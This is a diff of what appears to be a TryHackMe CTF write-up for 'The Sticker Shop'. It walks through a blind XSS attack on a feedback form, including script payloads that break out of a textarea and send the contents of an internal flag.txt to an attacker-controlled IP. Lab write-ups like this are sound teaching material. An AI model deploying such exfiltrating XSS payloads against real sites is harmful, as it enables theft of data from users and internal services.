ReneB-hub/bui.sk/_posts/2025-02-13-tryhackme-the-sticker-shop.md

 Let's visit Feedback subpage
 ![Submit Page](/images/tryhackme_the_sticker_shop/form.png){: width="600" height="450" .shadow}

+## Cross-Site Scripting

 Let's try some XSS

-Let's host a python server and try to fetch our attacker machine via script
+Let's host a python server and try to fetch our attacker machine via script:
 ```console
 python3 -m http.server 8000
 ```

-And Submit our script
+And Submit our script:

 ```console
 </textarea><script>fetch('http://10.11.75.122:8000');</script>
 ```

-We've got a response meaning we have a Blind XSS vulnerability
+We've got a response meaning we have a Blind XSS vulnerability.

 ![Submit Page](/images/tryhackme_the_sticker_shop/xss_to_myself.png){: width="600" height="450" .shadow}

-Now we can try to craft a payload which will look like this
+Now we can try to craft a payload which will look like this:
 ```console
 </textarea><script>async function a() {const res1 = await fetch('http://127.0.0.1:8080/flag.txt');const b = await res1.text();const res2 = await fetch('http://10.11.75.122:8000?a=' + b);}a();</script>
 ```